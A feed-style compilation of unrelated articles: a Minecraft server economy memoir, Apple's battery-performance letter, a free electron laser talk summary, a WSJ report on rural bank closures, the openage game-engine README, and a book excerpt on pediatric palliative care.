Samantha went first. She swept through the market buying out every single person with diamond to sell, then set up a buy chest at 12M and announced it to the server. People flocked to it, fighting to fill it up, and each time they did, she happily emptied it out so they could do it again. They all thought this was a windfall, a once in a lifetime shot to offload the accursed stones for more than they were worth, a boon offered by a wealthy eccentric just off a long break and looking to throw her fortune away. Soon enough, Samantha was tapped out, down to her last marble.

We waited a few days for the people she'd bought out to restock, the people who thought they missed out to put all they had up for sale in the hopes that it might move after all. At the designated time, we all moved our price to 18M and picked up where she left off, snapping up anything less than that and ferreting it away for later. It took just about all the money we had. I was down below 10k for the first time since a couple months after I started playing, and I wasn't the only one. We barely managed to pull it off, but we did it.

When it was just Samantha buying, it looked like an individual whim. Now that it was all of us, it was obvious to those paying attention that this was organized. But it didn't matter. By time people figured out they'd been had, we had all there was to be had. They went through their stages of grief, then they started buying from us again. Just like Samantha said.

Rumors swirled about a cabal of players manipulating the market, abusing their wealth to force a change that everyone else could only go along with. We coyly denied the whole thing, a wink and a smile, "Wow, wouldn't that be something if there was, hm?" They called us the diamond cartel. We called ourselves the Minecraft Illuminati.

Once we started making diamond money again, there was nothing that we couldn't do. No other item was duped so prolifically, and nothing available in comparable quantities came near its per-item cost. We were free to set the prices we pleased and had both the resources and the hubris to enforce them over any objection. Gold and coal up fivefold, wood and obsidian up ten. And every time we raised a price, our daily incomes went up higher.

There were no restraints anymore. We could do whatever we wanted. It was our server. Everyone else was just playing on it.

View of the market district from above.

A Whole New World

Eventually enough plugins updated for 1.7 that the admins decided it was time to update. This was known as the biome update, so named because it added dozens of new environment types and radically altered worldgen. Which meant that to take advantage of the new content, the server would be wiped, and everyone would start over.

In an attempt to prevent a repeat of the previous world, where a tiny clique of players achieved dizzying wealth at the expense of all the others, some measures were put in place to stymie our ambitions. An aggressive tax, scaling to multiple percent per day, on anyone holding more than a few tens of thousands of marbles. I warned this would backfire, that it would lead to pervasive hoarding and diamond as de facto alternative money, wildly distorting the market all to avoid taxation. This is exactly what happened: the price of diamond shot up relative to everything else, chronic shortages meant most players couldn't buy it at all, and those of us making big trades preferred to denominate in it rather than the official currency. I considered even standardizing a redstone contraption that would dispense a selectable number of items for every diamond inserted in, but never got around to it.

Meanwhile, in part to deal with the often intolerable lag of thousands of shop chests in one place, in part to reduce its grip on the daily flow of the game, the market was split up into four smaller areas. On the old server it had been one large, flat area, with square plots arranged in a grid, easy to browse and all conveniently located in one place. The new markets were pre-built structures laid out like model villages, with upstairs and downstairs, back entrances, none with the same layout, confusing to navigate and widely dispersed. Victoria came up with the idea of building our own market, that unlike the old server, we could build something with more utility than the official option and thus supplant it. We called it the Skymall: a pair of giant discs perched up at cloud level atop two massive pillars, shops arranged inside around their circumferences, connected by skybridge and easily accessible via nether portal just outside of spawn. Once we got established on the new server (which didn't take long) we plowed all our resources into this project for weeks. The Skymall opened to great fanfare; we sold out of storefronts within days, and it soon became the destination of choice for anyone heading to market.

But none of it had the same savor. The joy of my first run was starting from zero, knowing nothing of the server and little of the game, building my knowledge graph, learning, experimenting, getting results. The diamond cartel was our most audacious gamble, but it was still an unknown until we pulled it off. On the new server, everything felt rote. I scouted out a skeleton spawner and built an experience grinder my first day or two, got my enchanted diamond, constructed a 50-furnace autosmelter and a passive iron farm. I felt as a dreary Harappan, building things I'd already built time and again, without any inventiveness, any spark.

Once, when I wrote about all this in a different format, someone mentioned that online games don't necessarily have the same sort of stagnancy and barriers put up offline by entrenched, generational wealth. You can roll everyone back to zero and the selfsame people will get rich all over again. This is quite true. Part of it surely is many people don't like to play games the way we do. But much of it is you either have the time, skill, knowledge, and drive to work the angles and make your way to the top, or you don't. Making back our money wasn't just easy, it was trivial. Even with a leveled playing field, we raced ahead of everyone else. And then, one by one, we started to lose interest and drop off.

There's a skill curve to games like Europa Universalis where you start off bewildered by the multitudes of inscrutable systems laid out in front of you. Over time you learn to manage them, and the game shifts from something that seems to happen to you, to something you can participate in and compete with. But eventually you learn it well enough to find the cracks. With so much complexity, there are always oversights, always gamebreaking tactics, ways to grind the AI into dust. You have complete control over the game world, can effect any end you want. And then it becomes about building a story.

With Minecraft, with the economy, for us, there was no story to tell. There was only money.


A Message to Our Customers about iPhone Batteries and Performance

$
0
0

We’ve been hearing feedback from our customers about the way we handle performance for iPhones with older batteries and how we have communicated that process. We know that some of you feel Apple has let you down. We apologize. There’s been a lot of misunderstanding about this issue, so we would like to clarify and let you know about some changes we’re making.

First and foremost, we have never — and would never — do anything to intentionally shorten the life of any Apple product, or degrade the user experience to drive customer upgrades. Our goal has always been to create products that our customers love, and making iPhones last as long as possible is an important part of that.

How batteries age

All rechargeable batteries are consumable components that become less effective as they chemically age and their ability to hold a charge diminishes. Time and the number of times a battery has been charged are not the only factors in this chemical aging process.

Device use also affects the performance of a battery over its lifespan. For example, leaving or charging a battery in a hot environment can cause a battery to age faster. These are characteristics of battery chemistry, common to lithium-ion batteries across the industry.

A chemically aged battery also becomes less capable of delivering peak energy loads, especially in a low state of charge, which may result in a device unexpectedly shutting itself down in some situations.

To help customers learn more about iPhone’s rechargeable battery and the factors affecting its performance, we’ve posted a new support article, iPhone Battery and Performance.

It should go without saying that we think sudden, unexpected shutdowns are unacceptable. We don’t want any of our users to lose a call, miss taking a picture or have any other part of their iPhone experience interrupted if we can avoid it.

Preventing unexpected shutdowns

About a year ago in iOS 10.2.1, we delivered a software update that improves power management during peak workloads to avoid unexpected shutdowns on iPhone 6, iPhone 6 Plus, iPhone 6s, iPhone 6s Plus, and iPhone SE. With the update, iOS dynamically manages the maximum performance of some system components when needed to prevent a shutdown. While these changes may go unnoticed, in some cases users may experience longer launch times for apps and other reductions in performance.

Customer response to iOS 10.2.1 was positive, as it successfully reduced the occurrence of unexpected shutdowns. We recently extended the same support for iPhone 7 and iPhone 7 Plus in iOS 11.2.

Of course, when a chemically aged battery is replaced with a new one, iPhone performance returns to normal when operated in standard conditions.

Recent user feedback

Over the course of this fall, we began to receive feedback from some users who were seeing slower performance in certain situations. Based on our experience, we initially thought this was due to a combination of two factors: a normal, temporary performance impact when upgrading the operating system as iPhone installs new software and updates apps, and minor bugs in the initial release which have since been fixed.

We now believe that another contributor to these user experiences is the continued chemical aging of the batteries in older iPhone 6 and iPhone 6s devices, many of which are still running on their original batteries.

Addressing customer concerns

We’ve always wanted our customers to be able to use their iPhones as long as possible. We’re proud that Apple products are known for their durability, and for holding their value longer than our competitors’ devices.

To address our customers’ concerns, to recognize their loyalty and to regain the trust of anyone who may have doubted Apple’s intentions, we’ve decided to take the following steps:

  • Apple is reducing the price of an out-of-warranty iPhone battery replacement by $50 — from $79 to $29 — for anyone with an iPhone 6 or later whose battery needs to be replaced, starting in late January and available worldwide through December 2018. Details will be provided soon on apple.com.
  • Early in 2018, we will issue an iOS software update with new features that give users more visibility into the health of their iPhone’s battery, so they can see for themselves if its condition is affecting performance.
  • As always, our team is working on ways to make the user experience even better, including improving how we manage performance and avoid unexpected shutdowns as batteries age.

At Apple, our customers’ trust means everything to us. We will never stop working to earn and maintain it. We are able to do the work we love only because of your faith and support — and we will never forget that or take it for granted.

Free electron laser – A fourth-generation synchrotron light source [video]

$
0
0
media.ccc.de - Free Electron Lasers

Thorsten

Wouldn’t it be awesome to have a microscope which allows scientists to map atomic details of viruses, film chemical reactions, or study the processes in the interior of planets? Well, we’ve just built one in Hamburg. It’s not table-top, though: 1 billion Euro and a 3km long tunnel is needed for such a ‘free electron laser’, also called 4th generation synchrotron light source. I will talk about the basic physics and astonishing facts and figures of the operation and application of these types of particle accelerators.

Most people have heard about particle accelerators, most prominently LHC, at which high energy particles are brought to collision in order to study fundamental physics. However, in fact most major particle accelerators in the world are big x-ray microscopes.

The latest and biggest of these synchrotron radiation sources which was built is the European XFEL. A one billion Euro ‘free electron laser’, based on a superconducting accelerator technology and spread out 3km beneath the city of Hamburg. The produced x-ray pulses allow pictures, for example from proteins, with sub-atomic resolution and an exposure time short enough to enable in-situ studies of chemical reactions.

This talk aims to explain how particle accelerators and in particular light sources work, for what reason we need these big facilities to enable new types of science and why most of modern technology would be inconceivable without them.

Related

Download

These files contain multiple languages.

This Talk was translated into multiple languages. The files available for download contain all languages as separate audio-tracks. Most desktop video players allow you to choose between them.

Please look for "audio tracks" in your desktop video player.

Tags

Decline of Rural Lending Crimps Small-Town Business

$
0
0

ROXOBEL, N.C.—Danielle Baker wanted a $324,000 loan last year to expand the peanut-processing business she ran from the family farm. She had a longstanding relationship with the Roxobel branch of Southern Bank, and she thought Southern would help fund the peanut operation she had spun off, too.

But that branch—the town’s only bank—closed in 2014. A Southern banker based in Ahoskie, 19 miles away, said Bakers’ Southern Traditions Peanuts Inc. was too small and specialized, she says. A PNC bank branch also turned her down.

...

Open-source clone of the Age of Empires II engine

$
0
0

README.md

openage: a volunteer project to create a free engine clone of the Genie Engine used by Age of Empires, Age of Empires II (HD) and Star Wars: Galactic Battlegrounds, comparable to projects like OpenMW, OpenRA, OpenTTD and OpenRCT2. At the moment we focus our efforts on the integration of Age of Empires II, while being primarily aimed at POSIX platforms such as GNU/Linux.

openage uses the original game assets (such as sounds and graphics), but (for obvious reasons) doesn't ship them. To play, you require an original AoE II : TC installation or AoE II: HD (installation via Wine or Steam-Linux).

github stars#sfttech on Freenode#sfttech on matrix.orgquality badge

The foundation of openage:

TechnologyComponent
C++14Engine core
Python3Scripting, media conversion, in-game console, code generation
Qt5Graphical user interface
CythonGlue code
CMakeBuild system
OpenGL2.1Rendering, shaders
SDL2Cross-platform Audio/Input/Window handling
OpusAudio codec
HumansMixing together all of the above

Our goals include:

  • Fully authentic look and feel
    • This can only be approximated, since the behaviour of the original game is mostly undocumented, and guessing/experimenting can only get you this close
    • We will not implement useless artificial limitations (max 30 selectable units...)
  • Multiplayer (obviously)
  • Matchmaking and ranking with a haskell masterserver
  • Optionally, improvements over the original game
  • AI scripting in Python, you can use machine learning
  • Re-creating free game assets
  • An easily-moddable content format: nyan yet another notation
  • An integrated Python console and API, comparable to blender
  • Awesome infrastructure such as our own Kevin CI service

But beware, for sanity reasons:

  • No network compatibility with the original game. You really wanna have the same problems again?
  • No binary compatibility with the original game. A one-way script to convert maps/savegames/missions to openage is planned though.

Current State of the Project

  • What features are currently implemented?

  • What's the plan?

Dependencies, Building and Running

  • How do I get this to run on my box?

  • I compiled everything. Now how do I run it?

    • The convert script will transform original assets into openage formats, which are a lot saner and more moddable.
    • Use your brain and react to the things you'll see.
  • Waaaaaah! It

    • segfaults
    • prints error messages I don't want to read
    • ate my dog

All of those are features, not bugs.

To turn them off, use ./run --dont-segfault --no-errors --dont-eat-dog.

If this still does not help, try our troubleshooting guide, the contact section or the bug tracker.

Development Process

What does openage development look like in practice?

Can I help?

All documentation is also in this repo:

  • Code documentation is embedded in the sources for Doxygen (see doc readme).
  • Have a look at the doc directory. This folder tends to outdate when code changes.

OS X Version

Running openage on OS X worked in the past, and might or might not work right now.

Setting up continuous integration for this platform has some complications. Running a hackintosh VM seems to be not so legal, while buying dedicated hardware for it seems to be not so cheap. If you know of a legal and cost-free way of doing so or want to sponsor a semi-recent Mac Mini, please open a ticket in our issue tracker. Until then, PRs untested on OS X will make their way into the master branch and occasional breakage will occur.

Windows Version

The Windows port of openage is under development.

Setting up continuous integration for this platform has problems similar to the OSX version. If you know of a legal and cost-free way of acquiring and running a Windows VM, please open a ticket in our issue tracker. Until then, PRs untested on Windows will make their way into the master branch and occasional breakage will occur.

  • Being typical computer science students, we hate people.
  • Please don't contact us.
  • Nobody likes Age of Empires anyway.
  • None of you is interested in making openage more awesome anyway.
  • We don't want a community.
  • Don't even think about trying to help.

Guidelines:

  • No bug reports or feature requests, the game is perfect as is.
  • Don't try to fix any bugs, see above.
  • Don't implement any features, your code is crap.
  • Don't even think about sending a pull request.
  • Please ignore the easy tasks that could just be done.
  • Absolutely never ever participate in this boring community.
  • Don't note the irony, you idiot.

To prevent accidental violation of one of those guidelines, you should never

cheers, happy hecking.

Contact

If you have the desire to perform semi-human interaction, join our Matrix or IRC chatroom!

Do not hesitate to ping and insult us, we might not see your message otherwise.

For all technical discussion (ideas, problems, ...), use the issue tracker! It's like a mailing list.

For other discussions or questions, use our /r/openage subreddit!

License

GNU GPLv3 or later; see copying.md and legal/GPLv3.

I know that probably nobody is ever gonna look at the copying.md file, but if you want to contribute code to openage, please take the time to skim through it and add yourself to the authors list.

What We Get Wrong About Dying

$
0
0

My first exposure to the death of a patient came during my third year of medical school, in Israel. It was my first clinical rotation, which happened to be in internal medicine. Tagging along with my mentor, a senior physician to whom I had been assigned, on his morning rounds, we entered the room of an elderly woman who was critically ill with an antibiotic-resistant bacteria in her urinary system. The infection had spread throughout her frail body and was now wreaking havoc on most of her vital organs. Observing her for a few moments as she lay there unconscious, he said, “She’s almost at the end.”

I scrutinized the woman’s face, her breathing, the digital readouts of the instruments, trying to understand what signs he was so brilliantly interpreting. To me it seemed like voodoo, as though through some dark art he was able to peer into her very soul.

kali9 / Getty Images

Assuming that with nothing more to do here we would move on, I began to back away toward the door. But he surprised me by pulling a chair up to the bedside, sitting down, and taking one of the woman’s limp hands in his own. I realize now that in addition to providing her with the comfort of a human touch, he was also probably assessing her pulse, feeling her skin growing cooler, judging the blood flow to her extremities. But at the time I saw it simply as a kind human gesture, all the more startling because, though so simple, it struck me as a profound part of what it means to be a healer. Even though I was only a medical student, I was already so lost in my books, so focused on physiology and on memorizing for tests, that I had forgotten for a moment what I was really training for.

“She has no family here,” he said. “Never forget, if you accompany your patients only until the battle is lost and they are dying, if you abandon them at that point and leave them alone, you have done only part of your job, and not done it well. Your job is to accompany your patients until they are either better or safely on the other side.”

I sat in a chair on the opposite side of the bed, not yet brave enough to hold her other hand but trying to take it all in.

What he was saying sounded vaguely familiar, but from a very different context. I was reminded of the funeral of my first grandparent to die, my maternal grandfather, when I was 15 years old. At the graveside, after the few people in attendance had each thrown the traditional shovel-full of earth into the open grave and I had moved off to the side, my father called me back.

“Take this,” he said, keeping one shovel for himself and holding the other out for me, “we have to keep going until the grave is fully covered.”

“Why?” I asked. “I already put some dirt in.” I was still in the process of absorbing the loss of my grandfather and was in no hurry to participate in something so morbid.

“There’s no one else here who can do it,” he said. “The greatest thing you can do for him now as a grandson is to help me see to it that he is fully buried by us, his own family, and not just left for strangers to fill in the grave with a tractor.”

It was incredibly difficult for me but I did it, of course, down to the last shovel-full. And the experience stayed with me.

The Real Secret of Youth Is Complexity

Simplicity, simplicity, simplicity!” Henry David Thoreau exhorted in his 1854 memoir Walden, in which he extolled the virtues of a “Spartan-like” life. Saint Thomas Aquinas preached that simplicity brings one closer to God. Isaac Newton believed it leads to truth....READ MORE

In the hospital room with my mentor and the dying woman, I sat down in a chair on the opposite side of the bed, not yet brave enough to hold her other hand but trying to take it all in. Except for the sounds of the three of us breathing the room was still. As the minutes passed, the woman’s breathing became slower, wetter, more ragged. And then, suddenly, it just stopped. She was gone. I had witnessed my first death.

After he checked that there was no pulse and that she was indeed deceased, my mentor notified the nurse in charge, quickly signed the death certificate, and we moved on to the next patient on our rounds.

In one respect, which I didn’t fully appreciate at the time, this was amazing. My mentor had demonstrated an incredibly valuable and, I would come to realize, incredibly difficult skill: how to be present during a death. But the same time, I would later come to understand that he also displayed a poor adaptive response commonly seen in clinicians. He signed the certificate and moved on. That was it. To be fair, I don’t know what was going on in his head, if he was hurting inside and saving it up until after work, or if he was truly so jaded and busy that he was unaffected by the death of his patient. All I saw as a student was that the patient was dead and we were expected to move on, with no comment or reflection on what had just occurred.

My understanding then and throughout my training was that with the departure of the doctor after the death of a patient, the nursing staff takes over. They would provide support to the patient’s family and prepare the body to be moved to the hospital morgue. But as a medical student and later as a resident I had no idea what any of this entailed. It’s not part of a doctor’s training. During my pediatric oncology training the workload was so great and patient deaths so frequent, there never seemed to be time for me to even think about what happens to the body. And, in any case, I soon realized that expressing concerns about these sorts of things was neither encouraged nor supported; in fact, I worried it would be perceived as a show of weakness.

At Hadassah, as a senior physician, I finally have more of an opportunity to observe what happens after the death of a patient. Because, in accordance with their religious traditions, most Jews and Muslims want to bury their deceased before sunset on the day of death (and because both religious traditions specify the avoidance of autopsies at all costs), things tend to move pretty quickly. Family members are allowed as much time as they need in the room with the child, but in the meantime, we fill out and register a death certificate with the hospital clerks, a process that always seems fast and efficient. Israel’s bureaucracy is legendary, and Hadassah is generally no exception, but somehow the issuing of the death certificate always moves along quickly. It’s almost as if there is a recognition that something terribly sad has occurred, and that the usual bureaucratic shenanigans of daily life at Hadassah should be set aside to allow a bereaved family to proceed swiftly and peacefully to their loved one’s funeral.

Once the family has had some time alone in the room, we suggest that they step out so that we can clean the body. This is different from the ritual washing that the body will undergo once it has been transported to the appropriate burial society. But our washing and cleaning does take on its own special aura of ritual, and it’s almost as if families recognize that there is something sacred about this final act that we carry out for our patients. Even the Haredi families, usually so protective of their own, allow us this special role. Death can be messy, even when peaceful. It may involve bleeding or the loss of fluids from any number of tubes and openings. As we clean the body with sponges and soapy water, we wipe away stains and clean any lacerations. We remove tubes, IVs, catheters, and tape, and even occasionally sew up wounds left after the removal of tubes and instruments, so that there is no ongoing spillage as the body is moved and so that the signs of disease and treatment are minimized. I’ve always felt that this allows us to return some dignity to the patient, to erase some of the ravages of the dying process.

A still from the French film Les Sept Jours Shiva.

The first time a nurse asked me if I would help I hesitated. My job is done, my patient has passed away, why would I want to take part in something so, well, unpleasant? It was only later that I realized the invitation was not an attempt at offloading work onto me but, rather, a respectful invitation. An honor, even. Being allowed to help clean my patient’s body after his death, after my own treatments had failed, was an opportunity for me to provide one last act of kindness toward him. The patient, Dov, was a young man who had died of a progressive bone tumor. In the course of his treatment, one leg had been amputated. Despite that, the tumor had returned, spreading through his body and leaving the stump of his leg a swollen, rotting mass. The nurse caring for him very compassionately asked his family to wait outside as I went back into the room with her. Knowing what cancer can do to a person, my heart raced as I braced myself for what his exposed body might look like. She peeled back the sheets and, indeed, the stump and most of his lower body were engulfed and warped by the tumor. In several places the tumor had caused swelling and had even erupted from his body in fungus-like masses. I breathed through my mouth, afraid to smell the rotting flesh, and I focused on the nurse. She didn’t flinch once. I followed her lead as she deftly, even lovingly, removed the tubes and wires still stuck to Dov. She wiped the sweat and blood from his motionless body, rolling him from right to left and then back again, to make sure nothing was missed. Together we lifted him onto a clean sheet, slipping the soiled ones out from underneath, and wrapped him so that only his head and face showed. The whole process seemed to transform him in just a few minutes from a victim of disease and its treatments to the picture of a young man finally at rest.

What surprised me most was that the process was also transformative for me. I felt a sense of fulfillment of my responsibility to this person who had been entrusted into my care. I was not in any way more reconciled with or any less sad about the death of my patient. But I had long sensed that just walking away from my patient once he had been declared dead left some part of the work unfinished. In this preparation of Dov’s body, our staff carried out our final responsibilities to him, helping him complete his journey with dignity.

In pediatric oncology most patient deaths do not come as a complete surprise. Usually we know when the odds are worsening and our patient is heading down a path with only one realistic ending. But actually predicting how much time remains for a patient is notoriously difficult, in contrast to what you might think based on the movies when the doctor so confidently and grimly predicts that, “you’ve got six months to live.” How long a terminally ill patient has left to live may depend on a number of factors, many of which are not under our control. This makes the timing of critical discussions about decision-making and interventions incredibly important. At Hadassah, the point at which we see a child’s disease progressing despite therapy is when we typically begin discussions with the parents about what to do should something happen suddenly. We need to know what sort of resuscitation efforts should be made if a patient stops breathing (in which case the team might consider intubation and mechanical ventilation) or if her heart stops beating (in which case the team might attempt cardio-pulmonary resuscitation, or CPR). We refer to these sorts of discussions, the exploration of what the end might look like and what interventions make the most sense to a family, as advance care planning.

Not having these conversations early enough may lead to unnecessary suffering by both the patient and her family.

One issue that gets in the way of preparing for these possibilities is our Western culture’s near-obsessive insistence on death as a discrete, identifiable moment. This may be a convenient way of viewing death for a number of reasons—for legal and administrative purposes, such as registering time of death and tracking data, or psychologically, as a way of quantifying death as a thing that we can then plan to stave off and “defeat.” But death is not always so simple, so quantifiable. I now suspect that the first death I had witnessed in medical school, which I experienced as “here one minute, gone the next,” was far more complex than I was able to appreciate at the time. The reason my mentor had us stay with his dying patient that day was probably that he saw that the dying process had already begun. All of my clinical experience since those early days as a student has only strengthened my sense that death is a process, and not just a moment in time.

Most religious and spiritual traditions seem to recognize this as well, and often do a better job of accommodating this reality than our own medical system does. Within the Jewish tradition, for example, there is a specific term, goseis, used to indicate a person who is what the medical profession calls “actively dying,” who doctors believe has no more than hours or days left to live. According to kabalistic traditions, the soul of the departed person remains present in the home during the week that the family sits shiva (which is one of the reasons the mirrors in the home are traditionally covered, so that the soul won’t experience painful reminders that it no longer has a corporeal presence). There are non-Western traditions that incorporate this concept even more overtly into their beliefs surrounding death and dying. In the Tibetan Buddhist tradition, when death appears to be approaching, holy men are brought to the bedside to chant prayers. Once the point is reached that we in the West would call “time of death,” the holy men continue praying for three more days, which is considered to be a time of active transition for the spirit from one state to the next.

The inability, or unwillingness, to recognize death as a process inevitably leads to problems with having advance care planning discussions. Advance care planning doesn’t mean “giving up” on a patient and stopping all forms of treatment. It simply means talking through with the patient and family members the “what-ifs” before a crisis ensues, and discussing in a relatively calm setting what procedures are most in line with the family’s goals and religious or philosophical values. It doesn’t mean that a patient has to stop hoping for a remission or even for a cure, or stop pursuing active treatments. It just means preparing for other, more likely, possibilities. But however logical and reasonable this may seem in the abstract, pursing this type of conversation is for many reasons often difficult for everyone—clinicians, patients, and families alike.

Clinicians are human beings too, and they can sometimes engage in their own form of denial regarding signs of progressive disease or impending death in their patients. Or they may feel that this type of conversation is an acknowledgement of their own failure. They may worry that an unintended outcome of the conversation will be the loss of hope on the part of the patient and family. Whatever the reason, this is a difficult conversation for clinicians to initiate. They often avoid it by saying that the family “isn’t there yet,” in other words, isn’t ready to face the possibility that their child will not be cured of her disease. But not having these conversations early enough may lead to unnecessary suffering by both the patient and her family, with death occurring amidst a panicked, hurried mess of regrets over things left unsaid, and comfort-oriented options not pursued. And all too often the family is, indeed, “there”; they’re just waiting for the clinical team to open the discussion. The timing of advance care planning discussions can be tricky and, much like identifying a time of death, it can be difficult to identify a moment or trigger for starting the discussion.

There are better and worse ways to navigate these discussions. The clunkiest and possibly worst consists of a clinician laying out to parents the options of “doing everything” versus “just making the child comfortable.” Unfortunately, this is sometimes how things are presented. It suggests, erroneously, that parents are faced with an “either/or” proposition: We will make your child feel comfortable, or we will use extraordinary measures to try to keep her alive. Worse yet, we lay this unnecessary decision squarely on the ill-prepared shoulders of bewildered, grief-stricken parents. Alternatively, these conversations could happen in the context of a long-term relationship that has been established between the clinician and the family, during which a family’s goals, values, and expectations have been thought through. In these instances, clinicians are able to provide guidance to parents on decision-making and to suggest that, based on a family’s beliefs or goals, there might be certain procedures or interventions that should or should not be done. This is often where a palliative care team can be helpful, especially if they have been introduced early enough and have developed a relationship with the child and her family.

Advanced care planning is another realm where the rabbinic authorities in Israel play a major role, especially when it comes to the Haredi population. In the ideal world, communication between a patient’s rabbi and the medical team would be seamless, everyone working together to explore goals, hopes, and fears in order to come up with a plan that is both medically and religiously or culturally appropriate for a given family. But in reality that sort of relationship rarely materializes. Our medical determinations and suggestions are more often sketchily conveyed by heartbroken parents to rabbis who can therefore have at best only a limited understanding of the patient’s medical situation and prognosis. And so when we have advance care conversations with these families, what we most often hear is “the rabbi says that as long as there is life we must do everything possible.” Though it sounds definitive, there is an ambiguity in this response. Some clinicians will take this statement at face value and interpret it to mean that every attempt at resuscitation should be made no matter what. This will sometimes result in clinicians performing painful and pointless procedures on a dying child as weeping parents stand by, watching their child’s final moments in horror, having not understood what they were signing on for. But sometimes clinicians will dig deeper, sensing that there are unresolved issues inherent in the statement. What is “everything” they may ask? And when does “life” actually end? When is an action considered a reasonable intervention and when is it considered excessive and futile? When might an intervention actually fall into a category that is beyond “everything?” Often in my experience at Hadassah, when parents witness their child dying, when they see that the final moments are truly at hand, if we have developed a trusting relationship with them and have been engaging in these discussions over time, they tell us that attempting resuscitative efforts that are likely to be futile is not consistent with their values. In these situations, rather than asking for intubation and chest compressions, parents just want to hold their child and find meaning in those final moments of contact.

Elisha Waldman is associate chief, division of pediatric palliative care, at the Ann and Robert H. Lurie Children’s Hospital of Chicago. He received his bachelor’s degree from Yale University and his medical degree from the Sackler School of Medicine in Tel Aviv. His writing has appeared in Bellevue Literary Review and the Hill.

From the book:This Narrow Spaceby Elisha Waldman. Copyright © 2018 by Elisha Waldman. Published by arrangement with Schocken Books, an imprint of the Knopf Doubleday Publishing Group, a division of Penguin Random House LLC.

Decline of Rural Lending Crimps Small-Town Business

$
0
0
a traffic light with a building in the background© Veasey Conway for The Wall Street Journal

ROXOBEL, N.C.—Danielle Baker wanted a $324,000 loan last year to expand the peanut-processing business she ran from the family farm. She had a longstanding relationship with the Roxobel branch of Southern Bank, and she thought Southern would help fund the peanut operation she had spun off, too.

But that branch—the town’s only bank—closed in 2014. A Southern banker based in Ahoskie, 19 miles away, said Bakers’ Southern Traditions Peanuts Inc. was too small and specialized, she says. A PNC bank branch also turned her down.

“If you are not a big company with tons of assets and a big bank account,” Ms. Baker says, “they just overlook you.”

She finally got a loan from a nonprofit in Raleigh two hours away that provides financing to small businesses but not other traditional banking services. She must drive 19 miles every afternoon to make cash deposits or get change for her cash register, and expects to make a two-hour trip when she wants to refinance. Without a local branch close to her business, she says, “it’s very aggravating on a day-to-day basis.”

The financial fabric of rural America is fraying. Even as lending revives around cities, it is drying up in small communities. In-person banking, crucial to many small businesses, is disappearing as banks consolidate and close rural branches. Bigger banks have been swallowing community banks and gravitating toward the business of making larger loans.

Get a daily guide to the best stories in The Wall Street Journal from Editor in Chief Gerard Baker, delivered right to your inbox.

Distant banks with few ties to local communities—which often rely heavily on algorithms to gauge creditworthiness—are also less likely to have the personal relationships that have helped local bankers judge which borrowers were a good bet.

The phenomenon, almost automatically, is getting worse. Bankers say they don’t see enough business in small towns. Small towns say bank closings make it harder to do business.

“We’d like to make loans in all the markets we are in,” says R. Lee Burrows Jr., chairman of Union Bank in Greenville, N.C., population 91,495. “But sometimes the demand isn’t there,” he says. Banks’ “risk tolerance is substantially lower than it was pre-2008,” he says. Union was called “the little bank” until July, when it acquired another bank and moved from Kinston, population 20,923.

Southern Bancshares Inc. and PNC Financial Services Group Inc., the lenders Ms. Baker contacted, say they don’t comment on specific customers.

The value of small loans to businesses in rural U.S. communities peaked in 2004 and is less than half what it was then in the same communities, when adjusted for inflation, according to a Wall Street Journal analysis of Community Reinvestment Act data. In big cities, small loans to businesses fell only a quarter during the same period, mainly due to large declines in lending activity during the financial crisis. Adjusted for inflation, rural lending is below 1996 levels.

Of America’s 1,980 rural counties, 625 don’t have a locally owned community bank—double the number in 1994, federal data show. At least 35 counties have no bank, while about 115 are now served by just one branch.

“There’s been a slow seep, a slow letting air out of a balloon over a long period of time,” says Camden Fine, chief executive of Independent Community Bankers of America, a small-bank trade organization. “There’s less demand for credit. There’s less supply.”

Colorado State University economist Stephan Weiler found that declines in small-business lending in rural areas are linked to declines in the number of new businesses two to three years later—a phenomenon he didn’t find in urban areas. The falloff in lending is particularly important, he says, because other types of startup capital are typically scarcer in rural areas.

“To say that I am concerned is an understatement,” says Ray Grace, North Carolina’s commissioner of banks. The number of community banks is shrinking, and larger banks are taking deposits gathered in rural areas and deploying them in urban communities, he says. “It sucks the capital out of rural communities.”

Between 2009 and June 2017, North Carolina counties currently considered rural by the Centers for Disease Control and Prevention lost 131 bank branches, banking-regulator data show. That 18% drop compared with a 2% drop in Mecklenburg and Wake counties, home to Charlotte and Raleigh.

The gap is the more striking because North Carolina is a banking center, home to Bank of America Corp. and BB&T Corp. Bank of America has eight branches in seven rural counties in the state, down from 21 in 17 rural counties three years ago. “As the U.S. population continues to move to larger population centers,” a Bank of America spokesman says, “we want to insure that our branch coverage matches where people are moving.”

Around Roxobel, population 220, and other parts of rural northeastern North Carolina, the banking gap is hurting business. Three months after PNC closed a bank branch in Colerain, population 187, Tommy Davis closed his Nationwide Insurance office there. Losing the bank branch meant he had to drive 25 minutes each way daily to make deposits. And he lost foot traffic from people who once dropped by on their way to and from the bank.

“It’s really like a death sentence for a small town because the bank is the center of all activity,” says Mr. Davis, who owned the Colerain location for 20 years. He moved the business to Windsor, a larger town 25 miles away.

Twelve miles north of Roxobel in Woodland, population 729, Sharon Ramsey closed the DeJireh Grill because, she says, she couldn’t get bank financing. At first, she says, the restaurant “was turning a profit, but it was just enough to stay open.”

She was told she didn’t have enough credit history to qualify for a loan, Ms. Ramsey says. She closed DeJireh in 2013 after three years to focus on her variety store in nearby Conway, which lost its only bank branch several years ago.

Southern closed its Woodland branch three years ago. Then the local grocery store shut down. The loss of both means “most people drive through here” without stopping, says Joe Lassiter, owner of Lassiter’s Used Cars. He keeps no more than 10 cars on his lot, down from about 20 before.

Barbara Outland, owner of Grapevine Cafe down the street, drives 11 miles to Murfreesboro, N.C., to get change and make deposits. Ms. Outland, 71, says that as defense against any thieves eyeing that cash she locks up at night with a .38 Smith & Wesson revolver “in my hand, in plain view for all to see.”

Woodland Mayor Kenneth Manuel says Southern rejected the town’s request for an ATM, saying it needed 4,000 transactions a month to justify one.

Southern Senior Vice President John Heeden declines to comment on Woodland. “It is never easy to make such decisions that impact our friends and neighbors in these close-knit communities,” he says, “and Southern Bank certainly takes these decisions very seriously.”

The bank, with $2.6 billion in assets, was started by local investors in 1901 as Bank of Mount Olive. It has 61 branches, including the only bank in Woodland’s Northampton County. Southern says that 36 of its branches are in towns with populations under 6,000 and that in most areas where the bank has closed branches, there is another bank fairly close. “Southern Bank embraces its ongoing commitment to serve rural communities that are overlooked by many of our larger competitors,” Mr. Heeden says.

In considering closures, he says, “profitability and market dynamics are primary drivers, along with other factors that can vary over time and by market.”

Rural communities in parts of the U.S. have become less attractive to local banks because they are suffering from a variety of economic ills that have taken a toll on business activity and new business formation.

